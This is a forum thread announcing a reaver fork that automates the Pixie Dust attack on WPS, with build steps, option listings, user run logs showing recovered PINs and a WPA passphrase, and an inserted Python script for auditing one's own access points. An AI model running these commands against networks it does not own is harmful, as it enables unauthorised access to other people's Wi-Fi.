
Thread: Reaver modification for Pixie Dust Attack

  1. #1
    Member
    Join Date
    Apr 2015
    Posts
    39

    Reaver modification for Pixie Dust Attack

    Hello

    The community has modified reaver so that it can perform the Pixie Dust attack and automate the process of recovering the PIN.

    Other attacks were implemented (Pin Generator) and some improvements have been made.

    Development is ongoing and anyone is welcome to help.



    Here is our contribution

    GitHub
    https://github.com/t6x/reaver-wps-fork-t6x



    Overview

    reaver-wps-fork-t6x is a modification of a fork of reaver (https://code.google.com/p/reaver-wps-fork/)

    This modified version uses the Pixie Dust attack to find the correct WPS PIN

    The attack used in this version was developed by Wiire (https://github.com/wiire/pixiewps)



    Install Required Libraries and Tools

    Libraries for reaver

    Code:
    sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev
    Tools

    Code:
    You must have installed the pixiewps created by Wiire (https://github.com/wiire/pixiewps)


    Compile and Install

    Code:
    Build Reaver
    
          cd reaver-wps-fork-t6x-master
          cd src
          ./configure
          make
    
    Install Reaver
    
          sudo make install


    Usage - Reaver

    Code:
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
    
    Required Arguments:
            -i, --interface=<wlan>          Name of the monitor-mode interface to use
            -b, --bssid=<mac>               BSSID of the target AP
    
    Optional Arguments:
            -m, --mac=<mac>                 MAC of the host system
            -e, --essid=<ssid>              ESSID of the target AP
            -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
            -o, --out-file=<file>           Send output to a log file [stdout]
            -s, --session=<file>            Restore a previous session file
            -C, --exec=<command>            Execute the supplied command upon successful pin recovery
            -D, --daemonize                 Daemonize reaver
            -a, --auto                      Auto detect the best advanced options for the target AP
            -f, --fixed                     Disable channel hopping
            -5, --5ghz                      Use 5GHz 802.11 channels
            -v, --verbose                   Display non-critical warnings (-vv for more)
            -q, --quiet                     Only display critical messages
            -K  --pixie-dust=<number>       [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom, Realtek)
            -Z, --no-auto-pass              Do NOT run reaver to auto retrieve WPA password if pixiewps attack is successful
            -h, --help                      Show help
    
    Advanced Options:
            -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
            -d, --delay=<seconds>           Set the delay between pin attempts [1]
            -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
            -g, --max-attempts=<num>        Quit after num pin attempts
            -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
            -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
            -t, --timeout=<seconds>         Set the receive timeout period [5]
            -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
            -A, --no-associate              Do not associate with the AP (association must be done by another application)
            -N, --no-nacks                  Do not send NACK messages when out of order packets are received
            -S, --dh-small                  Use small DH keys to improve crack speed
            -L, --ignore-locks              Ignore locked state reported by the target AP
            -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
            -n, --nack                      Target AP always sends a NACK [Auto]
            -w, --win7                      Mimic a Windows 7 registrar [False]
            -X, --exhaustive                Set exhaustive mode from the beginning of the session [False]
            -1, --p1-index                  Set initial array index for the first half of the pin [False]
            -2, --p2-index                  Set initial array index for the second half of the pin [False]
            -P, --pixiedust-loop            Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
            -W, --generate-pin              Default Pin Generator by devttys0 team [1] Belkin [2] D-Link
    
    Example:
            reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1

    Option (K)

    Code:
    The -K option 1 runs pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and the Authkey. pixiewps will try to attack Ralink, Broadcom and Realtek
        
    *Special note: if you are attacking a Realtek AP, do NOT use small DH Keys (-S)

    Option (P)

    Code:
    Option (-P) in reaver puts reaver into a loop mode that does not do the WPS protocol to or past the M4 message to hopefully avoid lockouts. This is to ONLY be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins.
    This option was made with intent of:
    
    - Collecting repetitive hashes for further comparison and/or analysis / discovery of new vulnerable chipsets, routers etc.
    
    - Time sensitive attacks where the hash collecting continues repetitively until your time frame is met.
    
    - For scripting purposes, for those who want to use a possibly lockout-preventing way of PixieHash gathering for their use case.

    Usage - wash

    Code:
    Wash v1.5.2 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
    
    Required Arguments:
            -i, --interface=<iface>              Interface to capture packets on
            -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files
    
    Optional Arguments:
            -c, --channel=<num>                  Channel to listen on [auto]
            -o, --out-file=<file>                Write data to file
            -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
            -D, --daemonize                      Daemonize wash
            -C, --ignore-fcs                     Ignore frame checksum errors
            -5, --5ghz                           Use 5GHz 802.11 channels
            -s, --scan                           Use scan mode
            -u, --survey                         Use survey mode [default]
            -P, --file-output-piped              Allows Wash output to be piped. Example. wash x|y|z...
            -g, --get-chipset                    Pipes output and runs reaver alongside to get chipset
            -h, --help                           Show help
    
    Example:
            wash -i mon0


    Example

    Code:
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
    
    [+] Switching mon0 to channel 1
    [?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
    [+] Waiting for beacon from A.:9.:D.:....:....:...
    [+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: c6:66:a6:72:37:6d:......
    [P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:......
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Number: RT2860
    [P] WPS Model Serial Number: A978FD123BC
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:......
    [P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:......
    [+] Sending M2 message
    [P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
    [P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
    [Pixie-Dust]
    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] PSK1: dd:09:bd:24:......
    [Pixie-Dust][*] PSK2: 77:e0:dd:00:......
    [Pixie-Dust]   [+] WPS pin: 9178....
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running the reaver with the correct pin wait ...
    
    [Reaver Test] BSSID: A.:9.:D.:3.:..:..
    [Reaver Test] Channel: 1
    [Reaver Test] [+] WPS PIN: '9178....'
    [Reaver Test] [+] WPA PSK: '112233'
    [Reaver Test] [+] AP SSID: '....'

    Code:
    # wash -i mon0 -g -c 2
    XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
    XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U


    For any problem or suggestion, contact someone who is helping with the project.
    Last edited by t6_x; 2015-05-05 at 04:22 PM.

  2. #2
    Junior Member
    Join Date
    Mar 2015
    Posts
    3
    i like that way you think. it makes everything easier on the long run -good job!

    but get your sources right :

    perfect example:
    https://forums.kali.org/showthread.p...-WPS-Attack%29

  3. #3
    Senior Member
    Join Date
    Mar 2013
    Location
    milano
    Posts
    301
    hi
    thank you very much for your great contribution!!!!!!
    TNX

  4. #4
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    Awesome Sauce !! Nice job indeed.

    When run from root I get error below. yes I did sudo make install after compile.
    Code:
    root@kali:~# reaver -i mon0 -b 08:**:0C:**:F4:** -vv -S -N -K1 
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    
    [+] Waiting for beacon from 08:**:0C:**:F4:**
    [+] Switching mon0 to channel 1
    [+] Associated with 08:**:0C:**:F4:** (ESSID: TG1672GE2)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 91:80:26:70:44:a0:80:c9:f1:93:f7:f8:44:88:f0:b7
    [P] PKE: fa:6b:67:04:ce:29:9b:e7:9f:2d:7c:8b:9e:c5:9d:3b:1e:84:5c:cb:64:93:02:bb:29:3e:d0:5b:32:04:70:98:dc:d1:38:75:e3:68:54:5e:8f:3f:62:44:0c:08:06:89:58:a7:ba:08:59:91:7b:ee:63:e4:74:6a:47:de:f1:87:1c:ea:4d:47:2e:db:fe:41:51:e7:13:a2:55:85:b4:4d:98:d5:46:aa:4f:54:56:fe:4a:9a:b9:21:57:d8:ec:31:d6:61:b6:fe:55:e7:77:39:40:bc:d7:18:29:b8:c4:47:25:aa:3b:06:d7:f4:9a:72:72:cb:b4:30:a1:49:a7:97:b6:37:2f:76:4a:3d:c9:1d:0c:f1:75:ea:58:62:cc:a8:53:78:bf:93:fa:50:eb:5e:4f:2a:59:6e:ba:07:b5:d2:d7:b5:ca:2d:a4:57:3c:7a:87:61:26:dc:52:64:50:11:0e:4c:90:74:40:50:ae:9f:a5:b9:c1:9e:3f:38:93:a4
    [P] WPS Manufacturer: Celeno Communication, Inc.
    [P] WPS Model Number: CL1800
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: e1:21:a3:c4:34:de:bb:59:e2:8c:49:74:58:8e:79:f0:2f:b8:29:07:af:3d:62:2f:2a:9c:9e:61:9e:02:08:f0
    [+] Sending M2 message
    [P] E-Hash1: dc:fc:c2:c3:93:65:d6:15:f1:b6:3d:67:f3:39:61:0f:22:aa:78:a3:5d:41:eb:6d:67:fd:fc:bf:83:d4:f3:ee
    [P] E-Hash2: ad:95:ea:36:96:ec:bc:16:47:b6:b6:d1:49:90:e4:eb:d7:cd:20:ff:84:92:d0:b2:fc:e0:75:37:d8:4d:92:0c
    [Pixie-Dust]  
    [Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] PSK1: 4a:72:15:42:21:4b:69:ef:10:a4:41:bd:df:75:01:a8
    [Pixie-Dust]   [*] PSK2: 24:85:d0:a8:e4:20:c5:9d:04:d7:da:67:a6:df:af:3f
    [Pixie-Dust]   [+] WPS pin: 8127****
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]  
    Running the reaver with the correct pin wait ...
    
    [Reaver Test] BSSID: 08:**:0C:**:F4:**
    [Reaver Test] Channel: 1
    sh: 1: ./reaver: not found
    When run from src directory It works........
    Code:
    root@kali:~/reaver-wps-fork-t6x-master/src# reaver -i mon0 -b 08:**:0C:**:F4:** -vv -S -N -K1 
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    
    [+] Waiting for beacon from 08:**:0C:**:F4:**
    [+] Switching mon0 to channel 1
    [+] Associated with 08:**:0C:**:F4:** (ESSID: TG1672GE2)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: aa:c5:79:80:9d:3b:cc:46:7a:d5:c9:f5:b5:20:ae:bf
    [P] PKE: fa:6b:67:04:ce:29:9b:e7:9f:2d:7c:8b:9e:c5:9d:3b:1e:84:5c:cb:64:93:02:bb:29:3e:d0:5b:32:04:70:98:dc:d1:38:75:e3:68:54:5e:8f:3f:62:44:0c:08:06:89:58:a7:ba:08:59:91:7b:ee:63:e4:74:6a:47:de:f1:87:1c:ea:4d:47:2e:db:fe:41:51:e7:13:a2:55:85:b4:4d:98:d5:46:aa:4f:54:56:fe:4a:9a:b9:21:57:d8:ec:31:d6:61:b6:fe:55:e7:77:39:40:bc:d7:18:29:b8:c4:47:25:aa:3b:06:d7:f4:9a:72:72:cb:b4:30:a1:49:a7:97:b6:37:2f:76:4a:3d:c9:1d:0c:f1:75:ea:58:62:cc:a8:53:78:bf:93:fa:50:eb:5e:4f:2a:59:6e:ba:07:b5:d2:d7:b5:ca:2d:a4:57:3c:7a:87:61:26:dc:52:64:50:11:0e:4c:90:74:40:50:ae:9f:a5:b9:c1:9e:3f:38:93:a4
    [P] WPS Manufacturer: Celeno Communication, Inc.
    [P] WPS Model Number: CL1800
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: 0a:6b:15:aa:53:0d:c3:5f:56:bc:46:3a:a1:1a:89:26:ba:51:5b:1b:f6:9f:92:b3:c2:87:61:0b:e8:ce:c1:57
    [+] Sending M2 message
    [P] E-Hash1: 81:7e:70:4a:1e:62:f8:1f:d4:92:f3:60:0d:ea:52:a0:37:ca:75:e3:43:03:ca:fa:2b:60:5d:bf:33:03:9b:d8
    [P] E-Hash2: 82:c1:62:2c:ff:00:81:f6:46:14:44:f3:2f:f8:f1:95:60:73:da:1d:b6:8e:fc:bb:f0:cd:ff:f9:ce:25:76:63
    [Pixie-Dust]  
    [Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] PSK1: dc:64:ee:9b:dc:4e:39:e5:9c:a7:f4:82:d5:b1:e2:8d
    [Pixie-Dust]   [*] PSK2: 1d:7b:f9:0d:9c:0a:d8:a7:68:7e:3f:47:7b:59:e8:f9
    [Pixie-Dust]   [+] WPS pin: 8127****
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]  
    Running the reaver with the correct pin wait ...
    
    [Reaver Test] BSSID: 08:**:0C:**:F4:**
    [Reaver Test] Channel: 1
    [Reaver Test] [+] WPS PIN: '8127****'
    [Reaver Test] [+] WPA PSK: 'TG1672GD8****'
    [Reaver Test] [+] AP SSID: 'TG1672GE2'
    Probably my fault, just post my result, great job

  5. #5
    Member
    Join Date
    Apr 2015
    Posts
    39
    Probably my fault, just post my result, great job
    ops, forgot to commit to the github lol, is my fault sorry

    Commit done

    sorry for that

    I added a new option (-Z). With the -Z option it does not try to retrieve the password automatically; it stops executing when it finishes running pixiewps.

    I will add another option to have an option to output data to file, when you're ready I give commits

    I will improve a bit the initial post

    sorry again.

  6. #6
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    U Fixed it.

    -Z works correctly also

  7. #7
    Job well done =).

  8. #8
    Member
    Join Date
    Apr 2015
    Posts
    39
    Thank you very much, g0tmi1k



    New version available

    -P option of wash, created by t6x (displays the output of wash with pipes)

    Code:
    root@kali:~/# wash -i mon0 -P
    XX:XX:XX:XX:XX:XX| 1|-64|1.0|No |Wifi1
    XX:XX:XX:XX:XX:XX| 2|-53|1.0|No |Wifi2

    -P Option of reaver created by DataHead (M3 Loop)

    Code:
    Reaver remains in the loop M3 stage
    Last edited by t6_x; 2015-04-16 at 04:48 AM.

  9. #9
    Senior Member
    Join Date
    Mar 2015
    Posts
    127

    Nice work....
    -P option works great, take less screen space if multiple terminals running.
    Code:
    wash -i wlan1mon -P
    00:00:00:00:1E:90| 1|-60|1.0|Yes|DG1600000
    00:00:00:00:62:6C| 1|-55|1.0|No |Kirin00000
    00:00:00:00:46:00| 1|-59|1.0|Yes|DG1600000
    00:00:00:00:5C:C0| 1|-46|1.0|No |DG160000
    00:00:00:00:5B:6F| 1|-64|1.0|No |PS00000
    00:00:00:00:23:97| 1|-63|1.0|No |TH0000
    00:00:00:00:A9:5E| 1|-57|1.0|No |DVW000000
    00:00:00:00:08:86| 4|-58|1.0|Yes|H0000
    00:00:00:00:37:56| 6|-47|1.0|No |133 00000
    00:00:00:00:AD:00| 6|-47|1.0|No |Tomm00000
    00:00:00:00:07:00| 6|-58|1.0|Yes|Tupp000000
    00:00:00:00:AD:18| 6|-62|1.0|No |McP000000
    00:00:00:00:4E:50| 6|-52|1.0|No |DG10000000
    00:00:00:00:52:A1| 6|-57|1.0|No |133 00000
    00:00:00:00:B6:D0| 6|-45|1.0|No |We he0000000
    00:00:00:00:93:21| 8|-55|1.0|No |Trou0000000
    00:00:00:00:A2:70| 9|-52|1.0|No |TG160000000
    00:00:00:00:3E:6B|11|-41|1.0|No |DVW0000000
    00:00:00:00:9F:00|11|-66|1.0|No |SterlingWattersDraperPrice
    00:00:00:00:07:10|11|-47|1.0|Yes|DG0000000
    00:00:00:00:03:D9|11|-55|1.0|No |NET000000
    00:00:00:00:E8:86|11|-54|1.0|No |9060000000
    00:00:00:00:81:F0|11|-49|1.0|Yes|TG0000000
    00:00:00:00:A7:86|11|-30|1.0|No |b0c50000000
    00:00:00:00:45:00|11|-60|1.0|No |Pan000000
    Maybe make change on your fork GitHub page:
    Build Reaver

    cd reaver-1.4 to cd reaver-wps-fork-t6x-master
    cd src
    ./configure
    make

    Install Reaver

    sudo make install
    Also thanks for the credit.... but u typo my name.


    Question/Idea
    if option -K1 fail, does it automatically try -K2 or K3?
    if -K3 fail, does it check -K1 etc?

    or

    user must enter new command line each time?
    Last edited by nuroo; 2015-04-30 at 02:42 PM.
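
Added example (not part of the thread or of the reaver project's code): a parser for the pipe-delimited `wash -P` / `wash -g` output shown in the posts above, used to check an inventory of your own access points for WPS that is still advertised, listing unlocked ones first. The column meanings (BSSID, channel, RSSI, WPS version, locked, ESSID, plus manufacturer and model with `-g`) are inferred from the sample output; the BSSIDs, ESSIDs and inventory below are constructed.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

MAC_RE = re.compile(r"^[0-9A-F]{2}(:[0-9A-F]{2}){5}$")


@dataclass(frozen=True)
class WashEntry:
    bssid: str
    channel: int
    rssi: int
    wps_version: str
    locked: bool
    essid: str
    manufacturer: Optional[str] = None  # present only in -g output
    model: Optional[str] = None         # present only in -g output


def parse_wash(lines: Iterable[str]) -> List[WashEntry]:
    """Parse pipe-delimited wash rows; skip prompts, banners and bad rows."""
    entries = []
    for raw in lines:
        fields = [f.strip() for f in raw.strip().split("|")]
        if len(fields) not in (6, 8):       # 6 columns with -P, 8 with -g
            continue
        bssid = fields[0].replace(" ", "").upper()  # tolerate stray spaces
        if not MAC_RE.match(bssid):
            continue
        try:
            channel, rssi = int(fields[1]), int(fields[2])
        except ValueError:
            continue
        extra = fields[6:8] if len(fields) == 8 else [None, None]
        entries.append(WashEntry(bssid, channel, rssi, fields[3],
                                 fields[4].lower() == "yes", fields[5],
                                 extra[0], extra[1]))
    return entries


def audit(entries: Iterable[WashEntry],
          inventory: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (bssid, essid, status) for inventory APs seen by wash.

    wash lists only APs that advertise WPS, so every inventory BSSID that
    appears still has WPS switched on. Unlocked APs are sorted first.
    """
    owned = {b.upper() for b in inventory}
    findings = []
    for e in entries:
        if e.bssid not in owned:
            continue                        # not one of our devices
        state = "locked" if e.locked else "unlocked"
        findings.append((e.bssid, e.essid, f"WPS enabled, PIN {state}"))
    return sorted(findings, key=lambda f: f[2].endswith("unlocked") is False)


# Constructed sample input in the format shown in the thread.
SAMPLE = """\
# wash -i mon0 -P
02:00:00:00:00:01| 1|-60|1.0|Yes|office-ap
02:00:00:00:00:02| 6|-47|1.0|No |lab ap 2
02:00:00:00:00:03|11|-55|1.0|No |neighbour
02:00:00:00:00:04| 1|-68|1.0|No |guest| D-Link| DIR-615
not a wash row
""".splitlines()
INVENTORY = {"02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:04"}

if __name__ == "__main__":
    for bssid, essid, status in audit(parse_wash(SAMPLE), INVENTORY):
        print(f"{bssid}  {essid:<12} {status}")
```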

  10. #10
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    516
    Another idea... have all the extra stuff print only with verbosity mode selected

    Update: I'm getting a segmentation fault when I use -K 1 and -K 3

    Code:
    root@Kali:~# reaver -i mon0 -c 1 -b B4:75:0E:XX:XX:XX -vv -a -K 3 -P
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead
    
    [+] Switching mon0 to channel 1
    [+] Waiting for beacon from B4:75:0E:XX:XX:XX
    [+] Associated with B4:75:0E:XX:XX:XX (ESSID: *****)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 6b:35:4d:6f:05:8e:9c:80:55:68:25:4f:17:42:31:0d
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Belkin International
    [P] WPS Model Number: F9K1105 v2
    [+] Received M1 message
    [P] PKR: dc:4c:e3:b4:b2:4a:d1:e8:39:3c:bf:b8:f1:e6:01:ab:2a:3c:6b:0d:7b:07:71:5c:b9:08:b4:e4:65:c1:4a:0b:71:11:90:24:66:05:57:6a:48:9b:ba:ae:20:20:5b:e2:83:92:b0:9d:bb:d3:7c:9f:44:e7:af:72:50:c2:76:7d:ac:34:62:62:4e:3b:f3:35:7e:e5:03:c2:7d:36:76:df:91:45:71:a0:32:04:0f:9b:92:85:18:0c:d8:c1:d5:e4:fd:17:07:26:47:36:49:37:80:80:e6:14:c9:50:76:3b:7a:38:99:5f:35:96:1c:53:2a:0d:8f:ab:48:b0:1f:1a:21:06:27:41:2b:b0:26:13:79:e7:a9:51:e7:cd:e1:95:f1:c9:a9:7b:84:8c:c5:ea:4e:27:14:bb:30:01:87:a9:d9:c0:07:0d:81:e0:62:a8:38:70:d0:3d:54:8e:49:9c:1c:e8:42:4a:ea:0f:73:f1:a7:80:01:31:e2:14:02:4e
    [P] AuthKey: 03:c2:33:e0:d1:66:13:c1:d8:8f:a5:00:59:db:fc:8e:40:5d:2d:de:d7:8d:b4:97:ea:d9:c0:75:3d:71:c9:37
    [+] Sending M2 message
    [P] E-Hash1: 3a:9e:57:08:f3:fb:e1:ef:13:22:98:34:40:af:ef:cb:f7:00:ba:48:2b:7d:34:18:7f:c0:2d:80:9b:c2:7e:96
    [P] E-Hash2: 3c:70:b6:aa:df:50:a8:e3:c8:e7:20:7e:bd:01:38:2e:63:4f:e4:9f:c8:26:fe:23:0c:2c:e6:67:16:08:e1:71
    Segmentation fault
    Last edited by soxrok2212; 2015-04-14 at 10:50 PM.
